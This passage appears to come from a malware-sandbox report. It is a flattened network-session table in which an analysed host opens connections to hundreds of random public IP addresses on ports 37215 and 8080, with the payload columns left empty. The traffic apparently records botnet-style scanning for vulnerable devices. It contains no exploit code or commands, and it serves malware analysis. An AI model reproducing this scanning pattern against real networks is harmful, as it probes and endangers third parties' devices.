                                                        10895192.168.2.236034241.250.41.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10896192.168.2.2346928157.63.112.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10897192.168.2.235679041.142.220.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10898192.168.2.235095651.238.239.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10899192.168.2.2357112137.11.230.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10900192.168.2.2345792197.9.101.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10901192.168.2.2336822157.55.145.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10902192.168.2.234421441.5.136.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10903192.168.2.2335276139.103.239.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10904192.168.2.2343292157.36.70.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10905192.168.2.2351342157.169.153.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10906192.168.2.2346130197.185.198.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10907192.168.2.2341164157.24.85.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10908192.168.2.2348126197.142.226.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10909192.168.2.2343222157.70.96.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10910192.168.2.2345382157.159.162.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10911192.168.2.2339122157.163.216.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10912192.168.2.2345290157.150.204.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10913192.168.2.2341150166.224.169.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10914192.168.2.234017250.126.16.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10915192.168.2.235110641.227.227.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10916192.168.2.2348966157.151.237.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10917192.168.2.2360052157.99.76.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10918192.168.2.233913841.122.96.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10919192.168.2.233393841.181.44.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10920192.168.2.2342622157.71.131.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10921192.168.2.2345638157.79.140.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10922192.168.2.234742441.156.244.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10923192.168.2.2344874197.12.32.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10924192.168.2.2347226197.161.230.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10925192.168.2.2351500197.68.2.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10926192.168.2.233495841.70.201.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10927192.168.2.233781041.113.248.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10928192.168.2.2346466157.192.203.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10929192.168.2.2359856104.209.170.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10930192.168.2.2332792157.196.16.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10931192.168.2.2333072197.167.184.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10932192.168.2.234010441.32.62.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10933192.168.2.235559641.238.163.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10934192.168.2.2344810152.191.74.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10935192.168.2.2343286197.32.100.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10936192.168.2.2352756197.15.159.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10937192.168.2.234397078.17.188.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10938192.168.2.2357804157.15.83.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10939192.168.2.2341712157.247.42.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10940192.168.2.234060413.190.210.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10941192.168.2.2335772157.163.189.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10942192.168.2.234845441.85.233.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10943192.168.2.2346374197.213.159.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10944192.168.2.2352118197.248.193.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10945192.168.2.235974441.252.235.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10946192.168.2.2354460157.226.54.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10947192.168.2.2358918157.138.76.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10948192.168.2.2333222103.45.248.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10949192.168.2.2358484157.31.133.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10950192.168.2.2340932185.234.210.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10951192.168.2.2351974197.78.252.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10952192.168.2.2354096157.23.207.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10953192.168.2.233771041.73.93.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10954192.168.2.2338886197.149.30.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10955192.168.2.2348490106.237.161.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10956192.168.2.2344210157.63.212.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10957192.168.2.234109841.254.31.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10958192.168.2.233311641.170.48.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10959192.168.2.2339592157.144.92.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10960192.168.2.2351992197.83.43.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10961192.168.2.2355082182.220.125.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10962192.168.2.234344093.247.36.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10963192.168.2.2338632150.98.210.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10964192.168.2.234959441.226.161.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10965192.168.2.2351490217.14.98.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10966192.168.2.235704441.137.125.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10967192.168.2.2344094126.157.242.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10968192.168.2.235440041.69.222.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10969192.168.2.2345912124.147.37.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10970192.168.2.2350628198.28.188.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10971192.168.2.2344726132.137.25.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10972192.168.2.234859277.125.83.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10973192.168.2.234723282.86.63.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10974192.168.2.2341306209.216.5.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10975192.168.2.2358786129.249.247.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10976192.168.2.233978690.107.58.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10977192.168.2.233904458.221.236.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10978192.168.2.2346780107.7.223.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10979192.168.2.2347964149.170.176.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10980192.168.2.2359270154.34.55.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10981192.168.2.2341254194.103.17.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10982192.168.2.234105066.115.132.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10983192.168.2.2352728158.2.80.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10984192.168.2.233386285.8.219.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10985192.168.2.2357942201.137.98.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10986192.168.2.235640489.248.158.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10987192.168.2.2339546175.152.111.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10988192.168.2.235112050.82.120.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10989192.168.2.2354276134.237.198.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10990192.168.2.2345336212.71.3.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10991192.168.2.2338434126.152.197.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10992192.168.2.235309412.95.45.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10993192.168.2.234867096.11.82.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10994192.168.2.2334376185.183.65.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10995192.168.2.2352016177.66.182.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10996192.168.2.233900051.241.184.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10997192.168.2.235076467.195.21.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10998192.168.2.234999893.72.220.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10999192.168.2.2357714168.69.46.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11000192.168.2.235358436.231.78.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11001192.168.2.2355652213.205.101.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11002192.168.2.234326047.96.192.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11003192.168.2.2334296157.39.40.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11004192.168.2.235373817.154.217.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11005192.168.2.2358806158.11.190.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11006192.168.2.2357334163.68.56.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11007192.168.2.2346376166.236.217.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11008192.168.2.2350658209.69.48.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11009192.168.2.2347244202.59.176.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11010192.168.2.2355080158.222.113.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11011192.168.2.2338442102.181.5.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11012192.168.2.2334730192.148.94.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11013192.168.2.234552060.174.114.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11014192.168.2.2360388129.65.208.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11015192.168.2.235014072.155.10.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11016192.168.2.2356666184.1.214.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11017192.168.2.2360868192.20.164.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11018192.168.2.2343252154.149.183.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11019192.168.2.2336656120.169.210.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11020192.168.2.233659685.24.159.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11021192.168.2.234373831.38.59.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11022192.168.2.233330219.215.241.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11023192.168.2.2336158136.221.13.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11024192.168.2.2341566173.219.171.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11025192.168.2.235497659.133.18.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11026192.168.2.235971279.28.92.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11027192.168.2.2351328156.129.21.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11028192.168.2.2345332172.137.208.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11029192.168.2.233386469.171.123.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11030192.168.2.233746466.247.254.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11031192.168.2.2340586166.72.8.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11032192.168.2.235766457.85.207.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11033192.168.2.2341716196.219.104.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11034192.168.2.233988270.38.91.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11035192.168.2.2354128122.111.146.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11036192.168.2.2343414218.38.105.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11037192.168.2.2360802103.49.251.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11038192.168.2.2358852115.134.176.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11039192.168.2.2333926223.195.149.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11040192.168.2.2356050104.216.20.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11041192.168.2.23458841.50.6.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11042192.168.2.234329283.95.39.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11043192.168.2.233904279.60.81.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11044192.168.2.234432678.153.252.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11045192.168.2.234317248.219.164.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11046192.168.2.236054473.193.157.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11047192.168.2.2344098193.187.117.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11048192.168.2.235180899.250.106.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11049192.168.2.2346850209.77.131.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11050192.168.2.235489898.201.165.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11051192.168.2.235751647.251.206.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11052192.168.2.2351274133.101.122.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11053192.168.2.2348426193.162.50.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11054192.168.2.2346202119.183.226.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11055192.168.2.233621488.247.19.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11056192.168.2.234971070.129.175.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11057192.168.2.233551844.123.115.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11058192.168.2.2355320162.113.226.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11059192.168.2.2345546205.61.29.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11060192.168.2.235999887.20.210.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11061192.168.2.235089496.107.132.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11062192.168.2.233447241.13.76.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11063192.168.2.2352034221.87.39.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11064192.168.2.235984463.0.105.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11065192.168.2.2343414151.110.92.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11066192.168.2.2345636124.54.247.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11067192.168.2.235061440.154.77.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11068192.168.2.2341986145.198.98.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11069192.168.2.2335580125.139.191.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11070192.168.2.234536653.76.90.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11071192.168.2.235833041.28.110.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11072192.168.2.234875893.181.92.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11073192.168.2.235446440.3.59.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11074192.168.2.2345236114.116.42.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11075192.168.2.2360978151.69.217.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11076192.168.2.2353520168.240.16.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11077192.168.2.2343972101.28.123.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11078192.168.2.2334972128.83.77.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11079192.168.2.2339208135.210.207.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11080192.168.2.233699214.119.25.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11081192.168.2.2340240204.21.161.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11082192.168.2.233783442.146.181.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11083192.168.2.2341056143.203.137.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11084192.168.2.2351830201.132.60.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11085192.168.2.235330099.14.24.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11086192.168.2.2334736116.242.125.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11087192.168.2.2351826149.102.11.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11088192.168.2.2356406221.66.125.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11089192.168.2.235899019.252.13.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11090192.168.2.2351480167.41.45.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11091192.168.2.2346524223.126.137.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11092192.168.2.236059880.14.252.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11093192.168.2.2339946151.7.254.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11094192.168.2.235206474.181.124.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11095192.168.2.234047413.136.91.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11096192.168.2.2350198222.86.154.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11097192.168.2.235892294.16.163.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11098192.168.2.233304045.124.120.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11099192.168.2.233942697.176.12.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11100192.168.2.2354338178.16.225.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11101192.168.2.233723832.115.38.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11102192.168.2.2333762122.48.83.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11103192.168.2.2336970165.234.196.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11104192.168.2.2338102106.216.4.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
